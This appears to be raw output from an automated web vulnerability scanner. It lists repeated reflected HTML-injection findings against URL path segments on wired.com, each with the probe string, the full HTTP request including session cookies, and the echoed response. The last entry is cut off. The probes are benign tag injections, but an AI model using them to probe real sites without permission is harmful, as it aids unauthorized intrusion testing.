The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a82"><a>54e3f66b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries60a82"><a>54e3f66b7a/news/2007/05/dayintech_0503 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:39 GMT Date: Sun, 21 Nov 2010 23:10:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries60a82"><a>54e3f66b7a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91895"><a>1c7fed98e1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news91895"><a>1c7fed98e1a/2007/05/dayintech_0503 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:54 GMT Date: Sun, 21 Nov 2010 23:10:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news91895"><a>1c7fed98e1a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95176"><a>ea0344b1c10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science95176"><a>ea0344b1c10/discoveries/news/2007/05/dayintech_0515 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:45 GMT Date: Sun, 21 Nov 2010 23:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science95176"><a>ea0344b1c10 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d23ae"><a>0f5c0610fda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesd23ae"><a>0f5c0610fda/news/2007/05/dayintech_0515 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:06 GMT Date: Sun, 21 Nov 2010 23:11:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesd23ae"><a>0f5c0610fda c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30df0"><a>9cafe32651a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news30df0"><a>9cafe32651a/2007/05/dayintech_0515 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:20 GMT Date: Sun, 21 Nov 2010 23:11:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news30df0"><a>9cafe32651a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5ec"><a>c25249c30fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceca5ec"><a>c25249c30fc/discoveries/news/2007/05/dayintech_0524 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:22 GMT Date: Sun, 21 Nov 2010 23:10:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceca5ec"><a>c25249c30fc ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0442"><a>9e37c4acab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese0442"><a>9e37c4acab2/news/2007/05/dayintech_0524 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:43 GMT Date: Sun, 21 Nov 2010 23:10:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese0442"><a>9e37c4acab2 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13aa"><a>0ad5cf6d60a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsd13aa"><a>0ad5cf6d60a/2007/05/dayintech_0524 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:01 GMT Date: Sun, 21 Nov 2010 23:11:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsd13aa"><a>0ad5cf6d60a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9582"><a>bcb764a9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee9582"><a>bcb764a9769/discoveries/news/2007/05/dayintech_0528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:29 GMT Date: Sun, 21 Nov 2010 23:10:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencee9582"><a>bcb764a9769 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10800"><a>1d3b957fa67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries10800"><a>1d3b957fa67/news/2007/05/dayintech_0528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:47 GMT Date: Sun, 21 Nov 2010 23:10:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries10800"><a>1d3b957fa67 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 187f0"><a>98dbdd44018 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news187f0"><a>98dbdd44018/2007/05/dayintech_0528 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:04 GMT Date: Sun, 21 Nov 2010 23:11:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news187f0"><a>98dbdd44018"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49504"><a>10544948792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science49504"><a>10544948792/discoveries/news/2007/06/dayintech_0629 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:07 GMT Date: Sun, 21 Nov 2010 23:11:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science49504"><a>10544948792 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86976"><a>98f964069b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries86976"><a>98f964069b0/news/2007/06/dayintech_0629 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries86976"><a>98f964069b0 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5931b"><a>18d340cf7a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news5931b"><a>18d340cf7a3/2007/06/dayintech_0629 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:33 GMT Date: Sun, 21 Nov 2010 23:11:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news5931b"><a>18d340cf7a3"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf82e"><a>db00fe548f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecf82e"><a>db00fe548f1/discoveries/news/2007/09/dayintech_0903 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:05 GMT Date: Sun, 21 Nov 2010 23:11:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencecf82e"><a>db00fe548f1 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4d3a"><a>ccd81216dac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese4d3a"><a>ccd81216dac/news/2007/09/dayintech_0903 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:20 GMT Date: Sun, 21 Nov 2010 23:11:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese4d3a"><a>ccd81216dac c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f786"><a>0483485da03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news1f786"><a>0483485da03/2007/09/dayintech_0903 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:29 GMT Date: Sun, 21 Nov 2010 23:11:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news1f786"><a>0483485da03"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac5"><a>19e070cbea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb4ac5"><a>19e070cbea0/discoveries/news/2007/09/dayintech_0904 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
